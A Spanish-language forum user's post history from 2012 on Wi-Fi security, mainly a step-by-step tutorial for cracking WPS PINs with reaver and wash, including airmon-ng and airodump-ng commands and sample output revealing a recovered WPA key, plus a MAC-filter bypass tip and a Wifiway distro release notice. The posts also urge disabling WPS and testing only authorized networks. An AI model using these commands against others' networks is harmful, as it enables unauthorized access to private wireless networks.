Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ChimoC

#531
Buenas:

Vienen juntos ;), con instalar reaver ya se instala walsh

Un saludo

ChimoC
#532
Hacking Wireless / Re: Patrones ONOXXXX
18 Enero 2012, 15:21 PM
Buenas:

Si es tu red o estás auditorizado a auditarla puedes usar reaver a ver si es vulnerable por PIN de WPS

Un saludo

ChimoC
#533
Hacking Wireless / Re: Filtrado de Mac
17 Enero 2012, 09:43 AM
Buenas:

Siempre se puede probar con la MAC del router (bssid)... a ver si "traga" y ya solucionas la lista de MAC

Hablamos de suposiciones... ya que imagino que es tu outer

Un saludo

ChimoC
#534
Buenas:

Hemos estado hablando del tema pero no hemos hecho ningun post :silbar:

Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)

1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables (actualmente es wash  sin "l")

Walsh v1.3

Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help

Ejemplo de uso: walsh -i mon0 (actualmente sería wash -i mon0)

Scanning for supported APs...

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

Lo debeis parar con control+c

2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

  • 94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)

  • WPS PIN: '5XXXXXXX'

  • WPA PSK: '1XXXXXXXXX'

  • AP SSID: 'ONOXXXX'

    Así que ya sabeis que debeis deshabilitar el WPS de vuestro router

    Un saludo

    ChimoC

    P.D.: Si tecleais

    reaver --man

    Os saldrán más cosillas
    -------------------------------------------------------------------

    CHIPSETS SOPORTADOS:

    Atheros AR2425 (ath5k)
    Atheros AR5212
    Atheros AR5213A
    Atheros AR542x
    Atheros AR9271 (Perfecto)
    rtl8187L
    rtl8187B
    rtl8188ru
    rtl8192cu
    carl19170
    ipw2000
    rt2800pci
    Intel 3945ABG
    Intel 5100
    iwl3954
    iwl4965
    zd1211rw

    CHIPSETS CON SOPORTE PARCIAL:

    ath5k
    iwlagn
    rtl2800usb (con compat-wireless)
    b43 (Broadcom BCM4312 card)
    rt73 (con driver rt2501usb)
    rt2800usb (con compat-wireless-2011-12-30)
    rtl819x
    iwl4965
    rtl8188ru
    rtl8192cu

    CHIPSETS NO SOPORTADOS:


    iwl4965
    RT3070L
    Netgear WG111v3
    rt2800usb (RTL3070)
    rt2500
    rt2570
    Ipw2200
    RT73usb
    BCM4322
    zd1211usb



    --------------------------------------------------------------------

    Un ejemplo del user GARCAD


    Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4

    Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Switching mon0 to channel 1
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
    [+] Trying pin XXXXXXXX
    [+] Sending EAPOL START request
    [+] Sending identity response
    [+] Sending M2 message
    [+] Sending M4 message
    [+] Sending M6 message
    [!] WPS transaction failed, re-trying last pin
    [+] Key cracked in 5 seconds
    [+] WPS PIN: 'XXXXXXXX'
    [+] WPA PSK: 'nXXXXXXXXXXXXXX0'
    [+] AP SSID: 'XXXXXXXX'
    [+] Nothing done, nothing to save.

    Yo el proceso lo hago del siguiente modo.

    Pongo en modo monitor el adaptador

    # airmon-ng start wlan0

    Me crea un clon mon0

    Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal

    # airodump-ng mon0

    Cuando se en el canal que emite, cierro la ventana y sigo con...

    # airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO

    Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.

    Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.

    Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.



    Localizamos WPS y si esta activo o no lo esta.

    Si Wifi Protected Setup visualizamos 0x02 esta activo se puede mirar si es vulnerable, si vemos 0x01 esta en modo manual, desactivado.

    Como esta activada la protección con Wireskark en el archivo *.cap podemos ver 0x02 puedo empezar el ataque con el reaver.

    # reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv

    Salu2
#535
Buenas:

Si quieres sacar más jugo a este hobby debes aprender a usar lso comandos y saber qué es lo que quieres hacer y cómo se puede llegar a conseguir mediante comandos

El handshake a veces se consigue y otras no....porqué.....ni idea

El handshake lo conseguirás (no siempre) cuando la STATION se asocia al ROUTER

https://foro.elhacker.net/wireless_en_linux/guia_completa_aircrackng-t231434.0.html

https://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html

Y ahora debes buscar una aplicación que se llama reaver y sirve para redes con WPS activado

Un saludo y prueba solo con redes de las que tengas autorización

ChimoC
#537
Hacking Wireless / Re: Identificar SSID
15 Enero 2012, 01:36 AM
Buenas:

Por el BSSID puedes conocer la empresa fabricante y quien los usa

Un saludo

ChimoC
#538
Seguridad / Re: seguridad WIFI
12 Enero 2012, 09:59 AM
Buenas:

Además de contraseña WPA lo que debes hacer es deshabilitar WPS de tu router (si lo tuviese)

HAy que leer un poquito más antes de preguntar  ;)


ChimoC
#539
Hacking Wireless / Re: Upside-Down-Ternet
12 Enero 2012, 09:54 AM
Buenas:

Hay un montón de"chorraditas" que le puedes hacer a un intruso, pero lo importante es ¿vale la pena tener a un intruso que puede llegar a quitarte datos tuyos?

Yo de tí me ponía WPA, deshabilitaba (si lo tuviese) el WPS del router y después practicaría con un equipo MIO... y ya cuando "supiese" pues a lo mejor "jugaba"

Un saludo

ChimoC
#540
Wireless en Linux / Re: Wifiway 3.0 Liberada
12 Enero 2012, 09:46 AM
Bueno , pues despues de un par de semanas de salir wifiway 3.0 , lanzamos esta version 3.4 con arreglos varios y añadidos interesantes como la aplicacion de moda actualmente ( reaver wps ).

Es una masterizacion de wifiway 3.0 con la mayoria de problemas solventados, o al menos los de categoria "critica o grave" ...como los problemas de booteo.

la lista de cambios no es muy extensa ,pero si interesante.

Reconstruido modulo nvidia por conflico con intel 3945
Actualizado hashcat a version 007
Actualizado aircrack-ng a version 1.1 revision 2022
Añadido cheat max_loop=255 en las opciones de arranque
Añadido reaver 1.4
Añadido salvar sesion reaver
Añadido walsh
Solventados los problemas de booteo
Modificado script lilo y alguno mas apuntando a initrd.xz y no a initrd.gz que ya no se usa.
Eliminadas algunas paginas guardadas en firefox
Cambiado script make_iso por el del equipo de desarrollo
Cambiado dir2xzm por tener una version vieja
Eliminado sonido de bienvenida


En esta ocasion tengo que dar gracias a mas gente , cosa que me alegra, por que significa que hay gente que es capaz de colaborar de la manera que pueda , como nosotros ..en sus ratos libres, sin ningun tipo de ineteres y que por aqui no solo hay gente inetersada en REVENTAR WIFIS AJENAS.

A lo cual aprovecho recordar NO DAMOS SOPORTE Y NO ES NUESTRA FILOSOFIA , solo compartimos inquetudes desinteresadamente.

GRACIAS AL STAFF Y A LOS COLABORADORES DE LA ZONA NUEVA

y ya ,para no alargar mas el post , descarga y md5.

DESCARGA OFICIAL: http://download.wifislax.com/wifiway-3.4.iso

DESCARGA ALTERNATIVA: http://www.multiupload.com/8FMOZKCRHO

MD5: 3e0645da12d5bbbdb4dd335c891e2866